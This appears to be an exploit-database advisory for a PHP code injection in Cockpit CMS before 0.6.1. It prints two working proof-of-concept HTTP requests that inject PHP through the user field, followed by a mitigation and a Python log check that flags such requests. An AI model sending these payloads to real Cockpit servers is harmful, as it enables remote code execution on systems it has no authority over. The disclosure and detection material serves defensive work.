Vendor: Cockpit CMS
By: Rafael Resende
CVSS: 7.5 (HIGH)
PHP Code Execution
CWE: 78
Product Name: Cockpit CMS
Affected Version From: Cockpit CMS < 0.6.1
Affected Version To: Cockpit CMS < 0.6.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020
Cockpit CMS 0.6.1 – Remote Code Execution
Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.

Exploit Login:

    POST /auth/check HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0
    Content-Type: application/json; charset=UTF-8
    Content-Length: 52
    Origin: https://example.com

    {"auth":{"user":"test'.phpinfo().'","password":"b"}}

Exploit Password reset:

    POST /auth/requestreset HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0
    Content-Type: application/json; charset=UTF-8
    Content-Length: 28
    Origin: https://example.com

    {"user":"test'.phpinfo().'"}
Mitigation:
Update to versions >= 0.6.1
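
A log-side check for the two requests shown above, as an added example (not code from Cockpit or from the original advisory): it flags POSTs to /auth/check and /auth/requestreset whose user field contains a single quote, the character both payloads use to break out of the quoted string. The function names and the sample requests are constructed for illustration.

```python
import json

# Endpoint -> JSON path of the user field, both taken from the requests on this page.
WATCHED = {"/auth/check": ("auth", "user"), "/auth/requestreset": ("user",)}

def user_field(raw_request):
    """Return the user value of a watched POST, or None if absent or not applicable."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    parts = lines[0].split() if lines else []
    if len(parts) < 2 or parts[0] != "POST":
        return None
    path = parts[1].split("?", 1)[0]
    if path not in WATCHED:
        return None
    try:
        value = json.loads(body)
        for key in WATCHED[path]:
            value = value[key]
    except (ValueError, KeyError, TypeError):
        return None  # malformed or unexpected body: nothing to inspect
    return value

def is_suspicious(raw_request):
    """True when the user value is a string containing a single quote."""
    user = user_field(raw_request)
    return isinstance(user, str) and "'" in user

def build(path, body):
    """Constructed sample request (not captured traffic)."""
    return (f"POST {path} HTTP/1.1\r\nHost: example.com\r\n"
            f"Content-Type: application/json; charset=UTF-8\r\n\r\n{body}")

SAMPLES = {
    "login_payload": build("/auth/check", '{"auth":{"user":"test\'.phpinfo().\'","password":"b"}}'),
    "reset_payload": build("/auth/requestreset", '{"user":"test\'.phpinfo().\'"}'),
    "login_benign": build("/auth/check", '{"auth":{"user":"alice","password":"b"}}'),
    "other_path": build("/api/ping", '{"user":"it\'s"}'),
}

if __name__ == "__main__":
    for name, request in SAMPLES.items():
        print(name, is_suspicious(request))
```

Account names that legitimately contain an apostrophe will also match, so hits are triage leads to review against the installed Cockpit version rather than confirmed exploitation.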